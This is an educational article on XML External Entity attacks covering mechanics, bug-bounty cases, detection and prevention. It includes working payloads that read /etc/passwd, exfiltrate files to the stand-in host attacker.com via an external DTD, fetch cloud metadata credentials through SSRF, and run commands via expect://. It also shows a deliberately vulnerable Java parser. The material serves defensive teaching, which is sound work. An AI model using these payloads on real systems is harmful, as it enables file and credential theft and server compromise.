XML External Entity (XXE) Attack
An XML External Entity (XXE) attack exploits vulnerable XML parsers that process external entity declarations within XML input. By injecting a crafted Document Type Definition (DTD) into XML data sent to the application, the attacker forces the server to read local files, perform Server-Side Request Forgery (SSRF), cause denial of service, or, in certain configurations, achieve remote code execution. XXE is especially dangerous because XML parsing is ubiquitous: it underlies SOAP APIs, SAML authentication, Office documents, SVG images, RSS feeds, and countless data interchange formats.
How an XML External Entity (XXE) Attack Works
XML supports a feature called external entities, defined in a Document Type Definition (DTD). An entity is essentially a variable: <!ENTITY name "value"> defines an internal entity, while <!ENTITY name SYSTEM "file:///etc/passwd"> defines an external entity that loads its value from an external resource: a local file, a URL, or even a network service. When a vulnerable XML parser processes input containing these declarations and then expands the entity reference (&name;) in the document body, it fetches the external resource and includes its content in the parsed output. The attacker doesn't need special access; they simply submit crafted XML to any endpoint that parses XML input.
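As a rough illustration of the "entity as variable" idea, the sketch below expands an internal entity with Python's standard-library xml.etree.ElementTree. The document string and the helper name expanded_text are made up for this example, and external entities are deliberately not exercised.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: one internal entity declared in the DTD and
# referenced once in the body.
DOC = '<!DOCTYPE note [<!ENTITY name "value">]><note>&name;</note>'


def expanded_text(xml_text: str) -> str:
    """Return the root element's text after the parser has expanded entities."""
    return ET.fromstring(xml_text).text


print(expanded_text(DOC))
```

The parser replaces &name; with the declared value before the application ever sees the text, which is why an external entity pointing at a file or URL ends up in application data on a parser that resolves it.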
Identify XML input surfaces
The attacker maps all endpoints that accept or process XML: SOAP/REST API endpoints with Content-Type: application/xml or text/xml, file upload forms that accept DOCX/XLSX/SVG/XML files (all are XML-based), SAML SSO endpoints, RSS/Atom feed importers, XML-RPC endpoints, configuration file importers, and any endpoint that accepts multipart data where one part might be parsed as XML. Even JSON APIs may be vulnerable if the server also accepts XML (many frameworks auto-negotiate Content-Type). The attacker switches Content-Type from application/json to application/xml and submits equivalent XML. If the server processes it, XXE testing begins.
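The same inventory is useful to defenders auditing their own application. A minimal sketch, assuming the two sets below are a reasonable starting list (they are illustrative, not exhaustive, and is_xml_surface is a hypothetical helper name):

```python
# Content types and upload extensions that commonly reach an XML parser.
# Both sets are illustrative assumptions, not a complete inventory.
XML_CONTENT_TYPES = {
    "application/xml", "text/xml", "application/soap+xml",
    "application/rss+xml", "application/atom+xml", "image/svg+xml",
}
XML_BASED_EXTENSIONS = (".xml", ".svg", ".docx", ".xlsx", ".pptx", ".odt")


def is_xml_surface(content_type: str = "", filename: str = "") -> bool:
    """Return True if a request or upload is likely to be parsed as XML."""
    # Drop parameters such as "; charset=utf-8" before comparing.
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type in XML_CONTENT_TYPES or media_type.endswith("+xml"):
        return True
    return filename.lower().endswith(XML_BASED_EXTENSIONS)
```

Endpoints that advertise only JSON still need a manual check, since content negotiation cannot be inferred from the declared type alone.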
Test for basic XXE with a known file
The attacker submits XML containing an external entity that references a known, readable file: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. If the parsed response contains the file's content (the /etc/passwd user list), classic XXE is confirmed. On Windows, the test file is C:\Windows\win.ini. If the response doesn't reflect the entity value (the application doesn't echo the parsed XML), the attacker pivots to out-of-band (OOB) XXE, using an HTTP entity that triggers a callback to an attacker-controlled server: <!ENTITY xxe SYSTEM "http://attacker.com/xxe-test">. A DNS lookup or HTTP request recorded in the attacker's server logs confirms the vulnerability even without visible output.
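The confirmation step, checking whether a response reflects the test file, can be sketched as a simple heuristic. The two patterns are assumptions about what these files typically contain, and reflects_test_file is a hypothetical helper for authorized testing of your own systems:

```python
import re

# Heuristic markers: the root entry of /etc/passwd, or a section header that
# win.ini usually contains. Both are assumptions about typical file content.
PASSWD_MARKER = re.compile(r"\broot:[^:\n]*:0:0:")
WIN_INI_MARKER = re.compile(r"\[(?:fonts|extensions|mci extensions)\]", re.IGNORECASE)


def reflects_test_file(response_body: str) -> bool:
    """Return True if the response appears to contain a known test file."""
    return bool(
        PASSWD_MARKER.search(response_body)
        or WIN_INI_MARKER.search(response_body)
    )
```

A negative result does not rule out XXE; it only means the entity value was not echoed, which is the case the out-of-band technique addresses.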
Exfiltrate data via out-of-band channels
For blind XXE (no direct output), the attacker uses parameter entities to exfiltrate data through HTTP or DNS: (1) Define a parameter entity that reads a local file: <!ENTITY % data SYSTEM "file:///etc/passwd">; (2) Define a second parameter entity whose value declares a further entity embedding the file content in a URL: <!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?d=%data;'>"> (the inner percent sign is written as &#x25; because a literal % is not allowed inside an entity value); (3) Host an external DTD on the attacker's server containing these definitions, followed by the references %exfil; and %send; that trigger them; (4) Reference the external DTD: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">. The parser fetches the external DTD, processes the chained entity definitions, reads the local file, and sends its contents to the attacker's server as a URL parameter. DNS-based exfiltration, where the data is encoded in the hostname of the requested URL, can work even when outbound HTTP is blocked.
Perform SSRF via XXE
XXE is a powerful SSRF vector. By using entities with http:// or https:// URIs pointing to internal resources, the attacker forces the XML parser to make server-side requests: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> retrieves AWS instance metadata, including temporary IAM credentials, on instances that still allow IMDSv1 (IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot issue). <!ENTITY xxe SYSTEM "http://internal-api.corp:8080/admin/users"> accesses internal APIs. The XML parser acts as a proxy, making requests from the server's trusted network position and bypassing firewalls, VPNs, and network segmentation that would block direct external access.
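From the defender's side, the entity URIs described above can be classified before any parsing happens. A minimal sketch, assuming a hypothetical helper is_risky_system_identifier and an illustrative list of internal DNS suffixes; it does not resolve hostnames, so public names that point at internal addresses are not caught:

```python
import ipaddress
from urllib.parse import urlparse

# Hypothetical internal DNS suffixes; adjust to the environment.
INTERNAL_SUFFIXES = (".corp", ".internal", ".local")


def is_risky_system_identifier(uri: str, internal_suffixes=INTERNAL_SUFFIXES) -> bool:
    """Flag entity URIs that read local resources or target internal hosts."""
    parsed = urlparse(uri)
    if parsed.scheme.lower() not in ("http", "https"):
        # file://, expect://, php:// and similar are never expected in input.
        return True
    host = (parsed.hostname or "").lower()
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: flag bare names (e.g. "localhost") and names
        # under an assumed internal suffix. No DNS resolution is attempted.
        return "." not in host or host.endswith(internal_suffixes)
    return address.is_private or address.is_loopback or address.is_link_local
```

A check like this is a detection aid only; disabling external entities in the parser remains the actual fix.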
Denial of service and code execution
XXE enables potent DoS attacks: the 'Billion Laughs' attack (XML bomb) defines nested entities that expand exponentially. In the classic payload, nine levels of tenfold expansion turn one short string into a billion (10^9) copies from less than a kilobyte of XML, exhausting available memory and crashing the parser. For code execution, PHP's expect:// wrapper (expect://id) executes system commands when used as an entity URI, provided the expect extension is installed. Java's XSLT processing can be abused for code execution via embedded scripting. Even without direct code execution, the combination of file reading (extracting credentials) and SSRF (accessing internal services) typically provides a pathway to full server compromise.
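The expansion arithmetic can be sketched without parsing anything. The helper names and the entity names e0, e1, ... are made up for illustration; the code only builds the declarations as text and computes the size they would expand to:

```python
def build_nested_entities(levels: int, fanout: int = 10, base: str = "lol") -> str:
    """Return entity declarations with `levels` layers of nested references."""
    lines = [f'<!ENTITY e0 "{base}">']
    for level in range(1, levels + 1):
        # Each layer references the previous layer `fanout` times.
        refs = f"&e{level - 1};" * fanout
        lines.append(f'<!ENTITY e{level} "{refs}">')
    return "\n".join(lines)


def expanded_length(levels: int, fanout: int = 10, base: str = "lol") -> int:
    """Characters produced when the top-level entity is fully expanded."""
    return len(base) * fanout ** levels


declarations = build_nested_entities(9)
print(len(declarations), expanded_length(9))
```

With nine layers and a fanout of ten, declarations that fit in well under a kilobyte describe three billion characters of expanded text, which is why parsers need entity-expansion limits or a ban on DTDs.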
Real-World Examples
Facebook XXE via DOCX upload (Bug Bounty)
Security researcher Mohamed Ramadan discovered that Facebook's careers page processed uploaded DOCX resumes through an XML parser vulnerable to XXE. A DOCX file is a ZIP archive containing XML files; by modifying the internal XML to include an external entity pointing to a local file, the researcher read files from Facebook's servers. Facebook confirmed the vulnerability, patched it, and awarded a bug bounty. The case demonstrated that any file format based on XML (DOCX, XLSX, PPTX, ODT, SVG) can be an XXE vector, even when the application doesn't appear to accept raw XML input.
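Because a DOCX is just a ZIP of XML parts, an upload can be screened before any part reaches a parser. A minimal sketch using only the standard library; xml_parts_with_doctype and make_sample_docx are hypothetical helpers, the byte search assumes UTF-8 or ASCII-compatible parts (a UTF-16 part would slip past it), and member sizes are not limited here:

```python
import io
import zipfile
from typing import List


def xml_parts_with_doctype(upload: bytes) -> List[str]:
    """List XML members of a ZIP-based upload that contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(upload)) as archive:
        for name in archive.namelist():
            if name.lower().endswith((".xml", ".rels")):
                # Legitimate Office parts do not normally declare a DOCTYPE.
                if b"<!DOCTYPE" in archive.read(name):
                    flagged.append(name)
    return flagged


def make_sample_docx(document_xml: bytes) -> bytes:
    """Build a tiny in-memory archive shaped like a DOCX, for demonstration."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", document_xml)
    return buffer.getvalue()
```

For example, xml_parts_with_doctype(make_sample_docx(b"<w:document/>")) returns an empty list, while a part that starts with a DOCTYPE declaration is reported by name.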
SAML XXE affecting multiple SSO providers
Researchers from Duo Security (now part of Cisco) discovered XXE vulnerabilities in seven SAML SSO libraries across multiple languages (Python, Ruby, PHP, Java). SAML, the protocol underpinning enterprise single sign-on, uses signed XML messages. The vulnerable libraries parsed the XML before validating the signature, allowing attackers to inject XXE payloads into authentication messages. Any application using these libraries for SSO (including OneLogin, Shibboleth deployments, and custom SAML integrations) was vulnerable to authentication bypass, file disclosure, and SSRF. The finding affected thousands of enterprise applications.
Uber XXE via XLSX fare calculation
A researcher discovered that Uber's driver partner portal processed uploaded XLSX spreadsheets with a vulnerable XML parser. By crafting an XLSX file containing XXE payloads in the internal XML documents, the researcher achieved local file reading on Uber's servers. The vulnerability was in the fare calculation import feature where drivers uploaded spreadsheets. Uber awarded a $10,000 bug bounty. The case highlighted how XXE can hide in any feature that processes structured document formats (spreadsheets, word documents, presentations), not just obvious XML APIs.
Impact & Risk Assessment
XXE is rated High (and was a dedicated OWASP Top 10 category in 2017 as A4: XML External Entities) because it provides a versatile toolkit for attackers: local file disclosure reveals credentials, keys, and source code; SSRF enables access to cloud metadata endpoints and internal services; DoS via XML bombs can crash production systems; and in specific configurations, code execution is achievable. The attack surface is deceptively large: XXE isn't limited to explicit XML APIs. Any application processing DOCX, XLSX, SVG, SAML, RSS, SOAP, or configuration files may be vulnerable. The prevalence of XML in enterprise systems (SOAP services, SAML SSO, document processing pipelines) means that XXE continues to affect critical infrastructure even as newer applications move to JSON. Bug bounty programs consistently rank XXE among the top 10 most reported vulnerability classes.
How to Detect XML External Entity (XXE) Attacks
Monitor for XXE indicators across multiple layers: (1) WAF rules detecting DOCTYPE declarations, ENTITY definitions, and SYSTEM/PUBLIC keywords in incoming XML payloads, which rarely appear in legitimate application input; (2) Scan for entity references (&xxe;, %) and suspicious URIs in XML content (file://, expect://, php://, http:// pointing to internal IPs or metadata endpoints); (3) Monitor outbound network connections from XML processing services, since a parser making HTTP/DNS requests to unexpected destinations indicates XXE or SSRF exploitation; (4) Application-level logging that records XML parsing events and flags any external entity resolution; (5) Memory monitoring on XML processing services, where sudden memory spikes can indicate XML bomb (Billion Laughs) attacks; (6) Intrusion detection rules for known XXE payloads in HTTP request bodies and multipart upload content.
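Indicators (1) and (2) can be approximated with a small pattern scan over raw request bodies. This is a sketch under stated assumptions: the pattern set and the name xxe_indicators are illustrative, the scan expects UTF-8 or ASCII-compatible bytes, and payloads in other encodings such as UTF-16 would evade it.

```python
import re
from typing import List

# Illustrative patterns only; a production rule set would be broader.
INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE"),
    "entity": re.compile(rb"<!ENTITY"),
    "external_id": re.compile(rb'\b(?:SYSTEM|PUBLIC)\s+["\x27]'),
    "suspicious_uri": re.compile(rb"(?:file|expect|php|gopher)://", re.IGNORECASE),
}


def xxe_indicators(body: bytes) -> List[str]:
    """Return the names of all indicator patterns found in a request body."""
    return sorted(name for name, pattern in INDICATORS.items() if pattern.search(body))
```

A request carrying the basic test payload matches all four indicators, while ordinary element-only XML matches none, which makes the combination a low-noise signal for logging or alerting.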
How to Prevent XML External Entity (XXE) Attacks
The primary defense is disabling external entity processing in the XML parser, a single configuration change that neutralizes nearly all XXE variants. Implementation varies by language: (1) Java: DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); (2) Python: use the defusedxml library instead of the standard-library parsers (its parse functions accept forbid_dtd, forbid_entities, and forbid_external arguments), or, with lxml, create the parser with resolve_entities=False and no_network=True; (3) PHP: libxml_disable_entity_loader(true) (PHP < 8.0; the function is deprecated in 8.0, where external entity loading is disabled by default) and ensure LIBXML_NOENT is never passed to the parser; (4) .NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; (5) Ruby/Nokogiri: keep the default options or use Nokogiri::XML(input) { |config| config.strict.nonet }, and never enable noent or dtdload, because noent turns entity substitution on. Additionally: validate and sanitize XML input using schemas (XSD), reject XML containing DOCTYPE declarations at the WAF level, convert XML APIs to JSON where possible, keep XML processing libraries updated, and apply least privilege to the service account running XML processing to limit the impact of file disclosure.
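Where a hardened library is not available, the "reject any DOCTYPE" policy can be approximated with the standard library alone. The sketch below is one possible approach, not the method of any particular library: it runs a first pass with xml.parsers.expat whose DOCTYPE handler aborts parsing, and only then hands the input to ElementTree. The names DoctypeForbidden and parse_rejecting_doctype are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat at the start of a DOCTYPE, before any entity
    # declaration inside it is processed.
    raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")


def parse_rejecting_doctype(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE declaration."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    try:
        checker.Parse(data, True)
    except expat.ExpatError as exc:
        raise ValueError(f"Invalid XML: {exc}") from exc
    # No DOCTYPE means no entity declarations, so a normal parse is safe
    # with respect to XXE and entity-expansion bombs.
    return ET.fromstring(data)
```

The input is parsed twice, which is acceptable for small documents; for large inputs a dedicated library that enforces the same policy in a single pass is the better choice.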
Code Examples
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>attacker@example.com</email>
</user>
<!-- Server response includes the contents of /etc/passwd:
<user>
  <name>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...</name>
  <email>attacker@example.com</email>
</user>
-->

<!-- Blind XXE via out-of-band exfiltration: -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>
<!-- evil.dtd hosted on attacker's server:
<!ENTITY % payload "<!ENTITY send SYSTEM 'http://attacker.com/exfil?d=%file;'>">
%payload;
-->

import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Document;
import java.io.ByteArrayInputStream;

public class XMLProcessor {

    // VULNERABLE: Default Java DocumentBuilder allows external entities
    public Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // No security features configured, so XXE is possible!
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }

    // SECURE: Disable DTDs and external entities entirely
    public Document parseSafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Disallow DTDs entirely (the strictest and most effective option)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense-in-depth: disable external entities even if DTD is somehow allowed
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities", false);
        // Disable external DTD loading
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // Disable XInclude processing
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }
}

# RISKY: Standard-library XML parsers are not hardened against malicious XML
# (entity-expansion bombs on older Expat; external entities in some parsers)
# import xml.etree.ElementTree as ET  # DO NOT USE for untrusted XML
# tree = ET.parse('input.xml')        # No protection against hostile DTDs

# SECURE: Use the defusedxml library (pip install defusedxml)
import zipfile

import defusedxml.ElementTree as ET
from defusedxml import DefusedXmlException
from defusedxml.common import DTDForbidden, EntitiesForbidden


def parse_xml_safely(xml_string: str) -> dict:
    """Parse XML input with all dangerous features disabled."""
    try:
        # defusedxml rejects by default:
        # - Entity declarations (which also stops expansion bombs)
        # - External entity and external DTD references
        # forbid_dtd=True additionally rejects any DOCTYPE declaration.
        root = ET.fromstring(xml_string, forbid_dtd=True)
        return {
            'tag': root.tag,
            'text': root.text,
            'children': [
                {'tag': child.tag, 'text': child.text}
                for child in root
            ]
        }
    except DTDForbidden:
        raise ValueError('XML with DTD declarations is not allowed')
    except EntitiesForbidden:
        raise ValueError('XML with entity definitions is not allowed')
    except DefusedXmlException as e:
        raise ValueError(f'Potentially malicious XML blocked: {e}')
    except ET.ParseError as e:
        raise ValueError(f'Invalid XML: {e}')


# For DOCX/XLSX/SVG file processing:
def safe_process_docx(file_path: str) -> dict:
    """Process DOCX files with XXE protection; returns parsed trees by part name."""
    parsed = {}
    with zipfile.ZipFile(file_path, 'r') as z:
        # DOCX internal XML files that could contain XXE
        for xml_file in ['word/document.xml', 'word/styles.xml']:
            if xml_file in z.namelist():
                with z.open(xml_file) as f:
                    # Parse each internal XML file safely; hostile DTDs raise
                    parsed[xml_file] = ET.parse(f, forbid_dtd=True)
    return parsed